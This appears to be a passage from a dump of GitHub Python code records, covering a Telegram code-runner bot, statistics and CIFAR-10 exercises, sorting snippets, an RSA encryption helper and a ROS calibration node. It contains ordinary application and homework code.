N-Queen/boj_9663.py","file_name":"boj_9663.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"27792918486","text":"import logging\nclass NullHandler(logging.Handler):\n def emit(self, record):\n pass\nlog = logging.getLogger('ListeningEngine')\nlog.setLevel(logging.ERROR)\nlog.addHandler(NullHandler())\n\nimport threading\n\nimport EngineStats\nfrom EngineException import TearDownException, \\\n OutputUnavailableException\n\nclass ListeningEngine(threading.Thread):\n \n def __init__(self,listener,output_cb):\n \n # store params\n self.listener = listener\n self.output_cb = output_cb\n \n # log\n log.debug(\"creating instance\")\n \n # initialize parent class\n threading.Thread.__init__(self)\n \n # give this thread a name\n self.name = 'ListeningEngine'\n \n # local variables\n self.stats = EngineStats.EngineStats(['numIn',\n 'numOutOk',\n 'numOutFail'])\n \n #======================== public ==========================================\n \n def run(self):\n \n while True:\n \n # block until receiving some data\n try:\n (timestamp,source,data) = self.listener.getData()\n except TearDownException:\n # log\n self.warning(\"TearDown\")\n \n # stop this thread\n break\n \n # log\n log.debug(\"Got data {2} at {0} from {1}\".format(timestamp,source,data))\n \n # update stats\n self.stats.increment('numIn')\n \n # pass on to output\n try:\n self.output_cb((timestamp,source,data))\n except OutputUnavailableException:\n self.stats.increment('numOutFail')\n else:\n self.stats.increment('numOutOk')\n \n def stop(self):\n self.listener.stop()\n \n def getStats(self):\n return self.stats.getStats()\n \n #======================== private =========================================","repo_name":"openwsn-berkeley/openwsn-sw","sub_path":"software/openEndPoint/engine/ListeningEngine.py","file_name":"ListeningEngine.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"94"} +{"seq_id":"44157046466","text":"import random\n\n\ndef WeightedDie(Probabilities):\n count = 0\n p = random.uniform(0, 1)\n for keys, values in Probabilities.items():\n count = count + values\n if p < count:\n\n return keys\n\n\ndef Normalize(Probabilities):\n # your code here\n sumOfProbabilities = 0\n newlist = {}\n for i in Probabilities:\n sumOfProbabilities += Probabilities.get(i)\n for i in Probabilities:\n newlist[i] = 0\n for j in Probabilities:\n if i == j:\n newlist[i] += Probabilities[j] / sumOfProbabilities\n return newlist\n","repo_name":"PaulOnyekwelu/biology-meets-programming","sub_path":"week-4/test4.py","file_name":"test4.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"19149547623","text":"from telegram import ParseMode, InlineKeyboardButton, InlineKeyboardMarkup\nfrom telegram.ext.dispatcher import run_async\nfrom submodules import code_executor as ce\nfrom submodules import user_management as um\nfrom submodules import logger as lg\nimport json, threading, jsbeautifier, os, re, requests\n\n#------------------- User input functions -------------------#\n@run_async\ndef guide(update, context):\n \"\"\"\n Function to list help commands.\n Args:\n update: default telegram arg\n context: default telegram arg\n \"\"\"\n update.message.reply_text(\"\"\"Here are the currently available commands:\\n\n <b>/register</b> - registers your account\\n\n <b>/code</b> - toggles coding mode\\n\n <b>/version <number></b> - toggles source version <b>(1-4)</b>\\n\n <b>/run</b> - runs your code\\n\n <b>/clear</b> - clears your code\\n\n <b>/view</b> - shows your current code\\n\n <b>/help</b> - displays the available commands\\n\nHave ideas and suggestions for this mini project? Head over to the <a href=\"https://github.com/tjtanjin/telesourcebot\">Project Repository</a>!\"\"\", parse_mode=ParseMode.HTML, disable_web_page_preview=True)\n return None\n\n@run_async\ndef create_user(update, context):\n \"\"\"\n Function to create a user.\n Args:\n userid: userid of the new user\n \"\"\"\n #set default values and save to userinfo folder\n #The userid folder stores a mapping of userid to registered username in case a player changes username in future\n if um.check_exist_user(update.message.chat_id):\n update.message.reply_text(\"You are already registered!\")\n else:\n new_info = {\"username\":update.message.from_user.username, \"userid\":str(update.message.chat_id), \"mode\":\"1\", \"user_group\":\"normal\", \"version\":\"4\", \"code_snippet\":\"\"}\n lg.logbook(new_info, \"register\")\n with open(\"./userinfo/\" + str(update.message.chat_id) + \".json\", 'w+') as info_file:\n json.dump(new_info, info_file)\n update.message.reply_text(\"Registration successfully completed. <b>/code</b> to start coding!\", parse_mode=ParseMode.HTML)\n return None\n\n@run_async\ndef toggle_code(update, context):\n \"\"\"\n Function to toggle coding mode for user.\n Args:\n update: default telegram arg\n context: default telegram arg\n \"\"\"\n if not um.check_exist_user(update.message.chat_id):\n update.message.reply_text(\"You are not registered. Try <b>/register</b>\", parse_mode=ParseMode.HTML)\n else:\n user = um.load_user_data(update.message.chat_id)\n if not user:\n return error(update)\n if user[\"mode\"] == \"0\":\n user[\"mode\"] = \"1\"\n update.message.reply_text(\"<b>Code Mode Disabled</b>\", parse_mode=ParseMode.HTML)\n else:\n user[\"mode\"] = \"0\"\n update.message.reply_text(\"<b>Code Mode Enabled</b>\", parse_mode=ParseMode.HTML)\n um.save_user_data(user)\n return None\n\n@run_async\ndef toggle_version(update, context):\n \"\"\"\n Function to toggle source version for user.\n Args:\n update: default telegram arg\n context: default telegram arg\n \"\"\"\n if not um.check_exist_user(update.message.chat_id):\n update.message.reply_text(\"You are not registered. Try <b>/register</b>\", parse_mode=ParseMode.HTML)\n else:\n user = um.load_user_data(update.message.chat_id)\n if not user:\n return error(update)\n if context.args == []:\n update.message.reply_text(\"Usage: <b>/version <number> (1-4)</b>\", parse_mode=ParseMode.HTML)\n else:\n user[\"version\"] = context.args[0]\n update.message.reply_text(\"<b>Current Source Version: \" + context.args[0] + \"</b>\", parse_mode=ParseMode.HTML)\n um.save_user_data(user)\n return None\n\n@run_async\ndef run_code(update, context):\n \"\"\"\n Run the code snippet of the user.\n Args:\n update: default telegram arg\n context: default telegram arg\n \"\"\"\n executing_code = False\n def load_animation(user, update, message):\n \"\"\"\n Function that provides loading animation during code execution.\n Args:\n user: user running the code\n update: default telegram arg\n context: default telegram arg\n \"\"\"\n lg.logbook(user, \"run_code\")\n while executing_code:\n message.edit_text(text=\"<b>Executing Code /</b>\", parse_mode=ParseMode.HTML)\n message.edit_text(text=\"<b>Executing Code -</b>\", parse_mode=ParseMode.HTML)\n message.edit_text(text=\"<b>Executing Code \\\\</b>\", parse_mode=ParseMode.HTML)\n message.edit_text(text=\"<b>Executing Code |</b>\", parse_mode=ParseMode.HTML)\n message.edit_text(text=\"<b>Execution Complete:</b>\", parse_mode=ParseMode.HTML)\n return None\n\n if not um.check_exist_user(update.message.chat_id):\n update.message.reply_text(\"You are not registered. Try <b>/register</b>\", parse_mode=ParseMode.HTML)\n else:\n executing_code = True\n executing = update.message.reply_text(\"<b>Executing Code |</b>\", parse_mode=ParseMode.HTML)\n user = um.load_user_data(update.message.chat_id)\n um.verify_username(user, update.message.from_user.username)\n if not user:\n return error(update)\n threading.Thread(target=load_animation, args=(user, update, executing)).start()\n with open(\"./config/endpoint.json\", \"r\") as file:\n endpoint = json.load(file)[\"endpoint\"]\n res = requests.post(endpoint, data = {\"userid\": user[\"userid\"], \"version\": user[\"version\"]})\n output = res.content.decode('utf-8')[1:-1]\n executing_code = False\n update.message.reply_text(\"`\" + output + \"`\", parse_mode=ParseMode.MARKDOWN_V2)\n return None\n\n@run_async\ndef clear_code(update, context):\n \"\"\"\n Clear the code snippet of the user.\n Args:\n update: default telegram arg\n context: default telegram arg\n \"\"\"\n if not um.check_exist_user(update.message.chat_id):\n update.message.reply_text(\"You are not registered. Try <b>/register</b>\", parse_mode=ParseMode.HTML)\n else:\n user = um.load_user_data(update.message.chat_id)\n if not user:\n return error(update)\n user[\"code_snippet\"] = \"\"\n um.save_user_data(user)\n update.message.reply_text(\"<b>Code Cleared</b>\", parse_mode=ParseMode.HTML)\n return None\n\n@run_async\ndef view_code(update, context):\n \"\"\"\n View the current code of the user.\n Args:\n update: default telegram arg\n context: default telegram arg\n \"\"\" \n if not um.check_exist_user(update.message.chat_id):\n update.message.reply_text(\"You are not registered. Try <b>/register</b>\", parse_mode=ParseMode.HTML)\n else:\n user = um.load_user_data(update.message.chat_id)\n if not user:\n return error(update)\n code = jsbeautifier.beautify(user[\"code_snippet\"])\n if code == \"\":\n code = \"<b>No Existing Code Found.</b>\"\n update.message.reply_text(code, parse_mode=ParseMode.HTML)\n else:\n if len(code) > 4096: \n for i in range(0, len(code), 4096):\n update.message.reply_text(code[i:i+4096]) \n else:\n update.message.reply_text(code) \n return None\n\n@run_async\ndef check_mode(update, context): \n \"\"\"\n Function to check mode of user.\n Args:\n update: default telegram arg\n context: default telegram arg\n \"\"\"\n if not um.check_exist_user(update.message.chat_id):\n update.message.reply_text(\"You are not registered. Try <b>/register</b>\", parse_mode=ParseMode.HTML)\n else:\n user = um.load_user_data(update.message.chat_id)\n if not user:\n return error(update)\n mode = user[\"mode\"]\n if mode == \"0\":\n track_code(update.message.text, user)\n else:\n update.message.reply_text(\"Invalid input. Use /code to toggle code mode.\")\n return None\n\n@run_async\ndef view_logs(update, context):\n \"\"\"\n View the logs of the bot (admin only).\n Args:\n update: default telegram arg\n context: default telegram arg\n \"\"\"\n if not um.check_exist_user(update.message.chat_id):\n update.message.reply_text(\"You are not registered. Try <b>/register</b>\", parse_mode=ParseMode.HTML)\n else:\n user = um.load_user_data(update.message.chat_id)\n if not user:\n return error(update)\n if not um.check_user_permission(user, \"0\"):\n update.message.reply_text(\"<b>Insufficient Permission.</b>\", parse_mode=ParseMode.HTML)\n else:\n list_of_logs = os.listdir(\"./logs\")\n retrieved_logs = show_logs(len(list_of_logs), list_of_logs, user)\n update.message.reply_text(\"<b>Please select a log:</b>\", reply_markup=retrieved_logs, parse_mode=ParseMode.HTML)\n return None\n\n@run_async\ndef broadcast(update, context):\n \"\"\"\n Broadcast updates to users (admin only).\n Args:\n update: default telegram arg\n context: default telegram arg\n \"\"\"\n if not um.check_exist_user(update.message.chat_id):\n update.message.reply_text(\"You are not registered. Try <b>/register</b>\", parse_mode=ParseMode.HTML)\n else:\n user = um.load_user_data(update.message.chat_id)\n if not user:\n return error(update)\n if not um.check_user_permission(user, \"0\"):\n update.message.reply_text(\"<b>Insufficient Permission.</b>\", parse_mode=ParseMode.HTML)\n else:\n for filename in os.listdir(\"./userinfo/\"):\n if filename.endswith(\".json\"):\n context.bot.send_message(filename[:-5], text=\"<b>Announcement</b>: \" + ' '.join(context.args), parse_mode=ParseMode.HTML)\n\n@run_async\ndef retrieve_specified_log(update, context):\n \"\"\"\n Function that retrieves specific log for user.\n Args:\n bot: from telegram bot\n update: from telegram update\n \"\"\"\n context.bot.answer_callback_query(update.callback_query.id)\n data = update.callback_query.data\n match_file = re.match(r'get_logs_(\\S+)_(\\S+)', data)\n filename, userid = match_file.group(1), match_file.group(2)\n user = um.load_user_data(userid)\n if not user:\n return error(update)\n with open(\"./logs/\" + filename, \"r\") as file:\n content = file.read()\n if len(content) > 4096: \n for i in range(0, len(content), 4096): \n context.bot.send_message(chat_id=user[\"userid\"], text=content[i:i+4096]) \n else: \n context.bot.send_message(chat_id=user[\"userid\"], text=content)\n return None\n\n#------------------- Miscellaneous functions -------------------#\n\n@run_async\ndef track_code(text, user):\n \"\"\"\n Track code input of user in coding mode.\n Args:\n text: code to add\n user: user who is coding\n \"\"\"\n user[\"code_snippet\"] = user[\"code_snippet\"] + text.replace(\"\\n\", \"\").replace('“', '\"').replace('”', '\"').replace(\"‘\", \"'\").replace(\"’\", \"'\")\n um.save_user_data(user)\n return None\n\ndef build_menu(buttons, header_buttons=None, footer_buttons=None):\n \"\"\"\n Function to build the menu buttons to show users.\n \"\"\"\n menu = [buttons[i] for i in range(0, len(buttons))]\n if header_buttons:\n menu.insert(0, header_buttons)\n if footer_buttons:\n menu.append(footer_buttons)\n return menu\n\ndef show_logs(n_rows, text, user):\n \"\"\"\n Function that takes in button text and callback data to generate the view.\n Args:\n n_rows: rows for button\n text: list of texts to show\n user: user to show logs to\n \"\"\"\n button_list = []\n for i in range(0,n_rows):\n button_list.append([InlineKeyboardButton(text[i], callback_data=\"get_logs_\" + text[i] + \"_\" + user[\"userid\"])])\n reply_markup = InlineKeyboardMarkup(build_menu(button_list))\n return reply_markup\n\ndef error(update):\n \"\"\"\n Function that handles unexpected errors.\n Args:\n update: from telegram update\n \"\"\"\n update.message.reply_text(\"<b>An error has occurred. Please contact @FRUZNFEVER to resolve the issue.</b>\", parse_mode=ParseMode.HTML)\n","repo_name":"tjtanjin/telesourcebot","sub_path":"submodules/user_input.py","file_name":"user_input.py","file_ext":"py","file_size_in_byte":12193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"36081628883","text":"import numpy as np\nimport math as mt\nimport matplotlib.pyplot as plt\n\n#Закон зміни похибки – експонентційний, рівномірний;\n#Закон зміни досліджуваного процесу – квадратичний, постійна.\n\ndef uniform(n):\n distribution = np.random.rand(n)\n print(distribution)\n stats(distribution)\n plt.xlabel('Uniform Distribution')\n plt.hist(distribution, bins=20, facecolor=\"blue\", alpha=0.5)\n plt.show()\n return distribution\n\ndef exponential(n):\n distribution = np.random.exponential(size = n)\n print(distribution)\n stats(distribution)\n plt.xlabel('Exponential Distribution')\n plt.hist(distribution, bins=20, facecolor=\"blue\", alpha=0.5)\n plt.show()\n return distribution\n\ndef square(n, distribution, error, label): # квадратична модель\n distribution_1 = np.zeros(n)\n distribution_2 = np.zeros(n)\n for i in range(n):\n distribution_2[i] = (error * (i * i))\n distribution_1[i] = distribution_2[i] + distribution[i]\n plt.xlabel(label)\n plt.plot(distribution_1)\n plt.plot(distribution_2)\n plt.show()\n return distribution_1, distribution_2\n\ndef constant(n, const, error, distribution, label): # динаміка постійної модель, але треба лінійна\n masdistribution_3 = distribution_0 = np.zeros(n)\n for i in range(n):\n distribution_0[i] = (error * i)*const\n masdistribution_3[i] = distribution_0[i] + distribution[i]\n plt.xlabel(label)\n plt.plot(masdistribution_3)\n plt.plot(distribution_0)\n plt.show()\n return masdistribution_3, distribution_0\n\ndef stats(distribution):\n median_distribution = np.median(distribution)\n print(\"Mедіана - \", median_distribution)\n std_distribution = np.var(distribution)\n print(\"Дисперсія - \", std_distribution)\n skv_distribution = mt.sqrt(std_distribution)\n print(\"СКВ - \", skv_distribution)\n\ndef assessment(n, distribution_1, distribution_3, distribution_0, distribution, label):\n distribution_4 = np.zeros(n)\n for i in range(n):\n distribution_4[i] = (distribution_3[i] - distribution_0[i])\n plt.xlabel(label)\n plt.hist(distribution, bins=20, alpha=0.5, label='distribution')\n plt.hist(distribution_1, bins=20, alpha=0.5, label='distribution_1')\n plt.hist(distribution_3, bins=20, alpha=0.5, label='distribution_3')\n plt.hist(distribution_4, bins=20, alpha=0.5, label='distribution_4')\n plt.show()\n\n\nn = 17500\ndsigm = 5\ndm = 5\nerror = 0.0000005\ndistribution = np.random.randn(n)\nconst = 5\n\nuniform_distribution = uniform(n)\nexponential_distribution = exponential(n)\n\n#==============================================================================================\nsquare_uniform, distribution_2 = square(n, uniform_distribution, error, \"Динаміка Рівномірна - Квадратична\")\n\nplt.xlabel(\"гістограми законів розподілу Рівномірна - Квадратична\")\nplt.hist(uniform_distribution, label='distribution')\nplt.hist(distribution, label='distribution_1')\nplt.hist(square_uniform, label='distribution_3')\nplt.show()\nstats(square_uniform)\n\nassessment(n, distribution, square_uniform, distribution_2, uniform_distribution, \"оцінка статистичних характеристик Рівномірна - Квадратична\")\n\n#==============================================================================================\nsquare_exponential, distribution_2 = square(n, exponential_distribution, error, \"Динаміка Експоненційна - Квадратична\")\n\nplt.xlabel(\"гістограми законів розподілу Експоненційна - Квадратична\")\nplt.hist(exponential_distribution, bins=20, alpha=0.5, label='distribution')\nplt.hist(distribution, bins=20, alpha=0.5, label='distribution_1')\nplt.hist(square_exponential, bins=20, alpha=0.5, label='distribution_3')\nplt.show()\nstats(square_exponential)\n\nassessment(n, distribution, square_exponential, distribution_2, uniform_distribution, \"оцінка статистичних характеристик Експоненційна - Квадратична\")\n\n#==============================================================================================\nnormal_constant, distribution_2 = constant(n, const, error, uniform_distribution, \"Динаміка розподілу Рівномірна - Статична\")\n\nplt.xlabel(\"гістограми законів розподілу Рівномірна - Статична\")\nplt.hist(uniform_distribution, bins=20, alpha=0.5, label='distribution')\nplt.hist(distribution, bins=20, alpha=0.5, label='distribution_1')\nplt.hist(normal_constant, bins=20, alpha=0.5, label='distribution_3')\nplt.show()\nstats(normal_constant)\n\nassessment(n, distribution, normal_constant, distribution_2, uniform_distribution, \"оцінка статистичних характеристик Рівномірна - Cтатична\")\n\n#==============================================================================================\n\nexponential_constant, distribution_2 = constant(n, const, error, exponential_distribution, \"Динаміка розподілу Експоненційна - Статична\")\n\nplt.xlabel(\"гістограми законів розподілу Експоненційна - Статична\")\nplt.hist(exponential_distribution, bins=20, alpha=0.5, label='distribution')\nplt.hist(distribution, bins=20, alpha=0.5, label='distribution_1')\nplt.hist(exponential_constant, bins=20, alpha=0.5, label='distribution_3')\nplt.show()\nstats(exponential_constant)\n\nassessment(n, distribution, exponential_constant, distribution_2, uniform_distribution, \"оцінка статистичних характеристик Експоненційна - Квадратична\")","repo_name":"TheRegent/Data_analysis","sub_path":"DS/Lab1/lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":5925,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"20131889818","text":"from tensorflow.keras.datasets import cifar10\nfrom tensorflow.keras.layers import Activation, Dense, Dropout, Conv2D, Flatten, MaxPool2D\nfrom tensorflow.keras.models import Sequential, load_model\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.utils import to_categorical\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n(train_images, train_labels), (test_images, test_labels) = cifar10.load_data()\n\ndef data_preview(train_images, train_labels, test_images, test_labels):\n print(train_images.shape)\n print(train_labels.shape)\n print(test_images.shape)\n print(test_labels.shape)\n\n for i in range(10):\n plt.subplot(2, 5, i+1)\n plt.imshow(train_images[i])\n plt.show()\n\n print(train_labels[0:10])\n\n\ndata_preview(train_images, train_labels, test_images, test_labels)\n\n# prepared to normalize to 0.0-1.0 from 0-255\ntrain_images = train_images.astype('float32')/255.0\ntest_images = test_images.astype('float32')/255.0\n\n# prepared to transform one-hot\ntrain_labels = to_categorical(train_labels, 10)\ntest_labels = to_categorical(test_labels, 10)\n\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), activation='relu', padding='same', input_shape=(32, 32, 3)))\nmodel.add(Conv2D(32, (3, 3), activation='relu', padding='same'))\nmodel.add(MaxPool2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Conv2D(64, (3, 3), activation='relu', padding='same'))\nmodel.add(Conv2D(64, (3, 3), activation='relu', padding='same'))\nmodel.add(MaxPool2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\nmodel.add(Dense(512, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(10, activation='softmax'))\n\nmodel.compile(loss='categorical_crossentropy', optimizer=Adam(learning_rate=0.001), metrics=['acc'])\n\nhistory = model.fit(train_images, train_labels, batch_size=128, epochs=20, validation_split=0.1)\n\nplt.plot(history.history['acc'], label='acc')\nplt.plot(history.history['val_acc'], label='val_acc')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(loc='best')\nplt.show()\n\ntest_loss, test_acc = model.evaluate(test_images, test_labels)\nprint('loss: {:.3f}\\nacc: {:.3f}'.format(test_loss, test_acc))\n\nfor i in range(10):\n plt.subplot(2, 5, i+1)\n plt.imshow(test_images[i])\nplt.show()\n\ntest_predictions = model.predict(test_images[0:10])\ntest_predictions = np.argmax(test_predictions, axis=1)\nlabels = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']\nprint([labels[n] for n in test_predictions])\n","repo_name":"yukitaka/lab","sub_path":"machine-learning/example/ai_book3.py","file_name":"ai_book3.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"21479735840","text":"import os\nimport warnings\nfrom dendropy.utility import metavar\n\nDEPRECATION_WARNING_FILTER = None\n_DEPRECATION_WARNINGS_CONFIGURED = False\n\nclass CriticalDeprecationWarning(UserWarning):\n pass\n\ndef configure_deprecation_warning_behavior(warning_filter=None):\n global DEPRECATION_WARNING_FILTER\n global _DEPRECATION_WARNINGS_CONFIGURED\n if warning_filter is None:\n warning_filter = os.environ.get(metavar.DEPRECATION_WARNING_FILTER, \"default\")\n DEPRECATION_WARNING_FILTER = warning_filter\n warnings.simplefilter(DEPRECATION_WARNING_FILTER,\n CriticalDeprecationWarning)\n _DEPRECATION_WARNINGS_CONFIGURED = True\n\ndef _initialize_deprecation_warnings():\n global _DEPRECATION_WARNINGS_CONFIGURED\n if not _DEPRECATION_WARNINGS_CONFIGURED:\n configure_deprecation_warning_behavior()\n\ndef dendropy_deprecation_warning(**kwargs):\n _initialize_deprecation_warnings()\n leader = \" # \"\n stacklevel = kwargs.pop(\"stacklevel\", 3)\n if \"message\" in kwargs:\n message = kwargs[\"message\"]\n elif \"old_construct\" in kwargs or \"new_construct\" in kwargs:\n message = []\n message.append(\"\")\n if \"preamble\" in kwargs:\n message.append(leader + kwargs[\"preamble\"])\n message.append(leader + \"Instead of:\")\n for construct in kwargs[\"old_construct\"].split(\"\\n\"):\n message.append(leader + \" {}\".format(construct))\n message.append(leader + \"Use:\")\n for construct in kwargs[\"new_construct\"].split(\"\\n\"):\n message.append(leader + \" {}\".format(construct))\n if \"epilog\" in kwargs:\n message.append(leader + kwargs[\"epilog\"])\n message = \"\\n\".join(message)\n _initialize_deprecation_warnings()\n old_formatwarning = warnings.formatwarning\n warnings.warn(\n message=message,\n category=CriticalDeprecationWarning,\n stacklevel=stacklevel,\n )\n","repo_name":"jeetsukumaran/DendroPy","sub_path":"src/dendropy/utility/deprecate.py","file_name":"deprecate.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":195,"dataset":"github-code","pt":"94"} +{"seq_id":"70328983030","text":"\"\"\"\r\nInsertion Sort is comparing each element with all the other elements and inserting it in the correct position\r\nRemember with the card-deck shuffling technique\r\nAverage-case Time Complexity : O(n^2)\r\nWorst-case Time Complexity : O(n^2)\r\nBest-case Time Complexity : O(n)\r\nWorst-case Space Complexity : O(1)\r\n\"\"\"\r\n\r\ndef InsertionSort(list1):\r\n\tfor i in range(1, len(list1)):\r\n\t\tkey = list1[i]\r\n\t\tj = i - 1\r\n\t\twhile(j > 0 and list1[j] > key):\r\n\t\t\tlist1[j + 1] = list1[j]\r\n\t\t\tj -= 1\r\n\t\tlist1[j + 1] = key\r\n\r\nprint(\"Enter elements with a space : \")\r\nnums = [int(x) for x in input().split()]\r\nprint(\"Original List : \")\r\nprint(nums, sep=\", \")\r\nInsertionSort(nums)\r\nprint(\"Sorted List : \")\r\nprint(nums, sep=\", \")","repo_name":"chintanmehta21/Competitive-Programming","sub_path":"InsertionSort.py","file_name":"InsertionSort.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"34705841887","text":"# input = 'AABBCCCDDDD'\n# output = 'A2B2C3D4'\n\ns = 'AABBCCCDDDD'\ncount = 1\nres = ''\nfor i in range(len(s)-1):\n if s[i] == s[i+1]:\n count += 1\n else:\n res += s[i] + str(count)\n count = 1\nres += s[len(s)-1] + str(count)\n\nprint(res)\n","repo_name":"armanansari1997/Durga_Sir_Python_Programs","sub_path":"Coding_Questions2/prog_01.py","file_name":"prog_01.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"38114932688","text":"import floq.core.fixed_system as fs\nimport floq.evolution as ev\nimport floq.errors as er\nimport floq.helpers.index as h\n\n\nclass ParametricSystemBase(object):\n \"\"\"\n Base class to specify a physical system that still has open parameters,\n such as the control amplitudes, the control duration, or other arbitrary\n parameters in the Hamiltonian.\n\n This needs to be sub-classed, and a subclass should provide:\n - get_system(controls)\n\n \"\"\"\n\n def get_system(self, controls, t):\n raise NotImplementedError(\"get_system not implemented.\")\n\n\n def is_nz_ok(self, controls, t):\n system = self.get_system(controls, t)\n try:\n u = ev.evolve_system(system)\n except er.EigenvalueNumberError:\n return False\n\n return h.is_unitary(u)\n\n\n def set_nz(self, controls, t):\n if self.is_nz_ok(controls, t):\n self.decrease_nz_until_not_ok(controls, t, step=max(10, self.nz/5))\n self.decrease_nz_until_not_ok(controls, t, step=max(10, self.nz/10))\n self.decrease_nz_until_not_ok(controls, t, step=2)\n self.increase_nz_until_ok(controls, t, step=2)\n else:\n self.increase_nz_until_ok(controls, t, step=max(10, self.nz/5))\n self.decrease_nz_until_not_ok(controls, t, step=2)\n self.increase_nz_until_ok(controls, t, step=2)\n\n\n def increase_nz_until_ok(self, controls, t, step=2):\n while self.is_nz_ok(controls, t) is False:\n self.nz += h.make_even(step)\n\n\n def decrease_nz_until_not_ok(self, controls, t, step=2):\n while self.is_nz_ok(controls, t) and self.nz-step > 3:\n self.nz -= h.make_even(step)\n\n\n\n\nclass ParametricSystemWithFunctions(ParametricSystemBase):\n \"\"\"\n A system with parametric hf and dhf, which are passed as callables to the constructor.\n\n hf has to have the form hf(a,parameters)\n \"\"\"\n\n def __init__(self, hf, dhf, nz, omega, parameters):\n \"\"\"\n hf: callable hf(controls,parameters,omega)\n dhf: callable dhf(controls,parameters,omega)\n omega: 2 pi/T, the period of the Hamiltonian\n nz: number of Fourier modes to be considered during evolution\n parameters: a data structure that holds parameters for hf and dhf\n (dictionary is probably the best idea)\n \"\"\"\n self.hf = hf\n self.dhf = dhf\n self.omega = omega\n self.nz = nz\n self.parameters = parameters\n\n def calculate_hf(self, controls):\n return self.hf(controls, self.parameters, self.omega)\n\n def calculate_dhf(self, controls):\n return self.dhf(controls, self.parameters, self.omega)\n\n def get_system(self, controls, t):\n hf = self.calculate_hf(controls)\n dhf = self.calculate_dhf(controls)\n return fs.FixedSystem(hf, dhf, self.nz, self.omega, t)\n","repo_name":"sirmarcel/floq","sub_path":"benchmark/museum_of_evolution/uncompiled_floq/parametric_system.py","file_name":"parametric_system.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"72066475188","text":"from Crypto.PublicKey import RSA\nfrom Crypto.Cipher import PKCS1_OAEP\nimport os\nimport json\nimport uuid\nfrom utils.enc_utils import EncUtils\n\n\nclass EncService(object):\n\n @classmethod\n def generate_key(cls):\n\n private_key = EncUtils.get_rsa_key()\n private_key_obj = EncUtils.import_key(private_key)\n public_key= EncUtils.export_key(private_key_obj.publickey())\n \n return {\n \"private_key\": private_key,\n \"public_key\":public_key\n }\n\n @classmethod\n def encrypt(cls, request: dict):\n\n plain_text_data = request[\"plain_text_data\"]\n public_key = request[\"public_key\"]\n public_key = EncUtils.import_key(public_key)\n print (\"type of message : \", type(bytes(plain_text_data, 'utf8')))\n ciphertext = EncUtils.long_encrypt(bytes(plain_text_data, 'utf8'), public_key)\n encoded_ciphertext = EncUtils.encode(ciphertext)\n\n return {\n \"encoded_ciphertext\": str(encoded_ciphertext, 'utf8')\n }\n\n \n @classmethod\n def decrypt(cls, request: dict):\n\n encoded_ciphertext = request[\"encoded_ciphertext\"]\n private_key = request[\"private_key\"]\n private_key = EncUtils.import_key(private_key)\n ciphertext = EncUtils.decode( bytes(encoded_ciphertext, 'utf8'))\n plain_text_data = EncUtils.long_decrypt(ciphertext, private_key)\n\n return {\n \"plain_text_data\": str(plain_text_data, 'utf8')\n }\n ","repo_name":"smitrajput/CosmoVoting","sub_path":"encryption_service/services/enc_service.py","file_name":"enc_service.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"16893143266","text":"#!/usr/bin/env python3\nimport time\nimport numpy as np\nimport cv2\nimport rospy\nimport ros_numpy\nfrom sensor_msgs.msg import Image, CameraInfo\nfrom kident2.srv import Get_q, Get_qResponse\nfrom kident2.msg import DiffMeasurement\nfrom collections import deque\nimport random\nimport utils\nfrom parameter_estimator import ParameterEstimator, RLS\nfrom scipy import linalg\nfrom Pose_Estimation_Class import UKF\nimport pickle\n\n\nclass ExtrinsicCalib:\n \"\"\"\n \"\"\"\n\n def __init__(self) -> None:\n # data for aruco estimation to be moved to rosparam from constructor\n\n self.theta_nom = ParameterEstimator.dhparams[\"theta_nom\"]\n self.d_nom = ParameterEstimator.dhparams[\"d_nom\"]\n self.r_nom = ParameterEstimator.dhparams[\"r_nom\"]\n self.alpha_nom = ParameterEstimator.dhparams[\"alpha_nom\"]\n\n self.M = np.zeros((3, 3))\n\n rospy.loginfo(\"Tracker waiting for service get_q_interp\")\n rospy.wait_for_service('get_q_interp')\n self.get_q_interp_proxy = rospy.ServiceProxy('get_q_interp', Get_q)\n self.pub_image_overlay = rospy.Publisher(\"image_overlay\", Image, queue_size=20)\n\n self.observations = dict() # keys are marker ids, for each id there is a deque of observations\n\n self.pub_meas = rospy.Publisher(\"diff_meas\", DiffMeasurement, queue_size=20)\n rospy.loginfo(\"Tracker initialized\")\n\n self.frame_prescaler = 0\n self.C = np.zeros((0, 3))\n self.d = np.empty(0)\n\n self.ukf = UKF()\n\n self.cntr = 0\n observations_file_str = \"observations_small.p\"\n observations_file = open(observations_file_str, 'rb')\n\n # dump information to that file\n self.observations = pickle.load(observations_file)\n # close the file\n observations_file.close()\n\n\n\n def process_observations(self):\n \"\"\"\n Go over each marker tracked in observations and 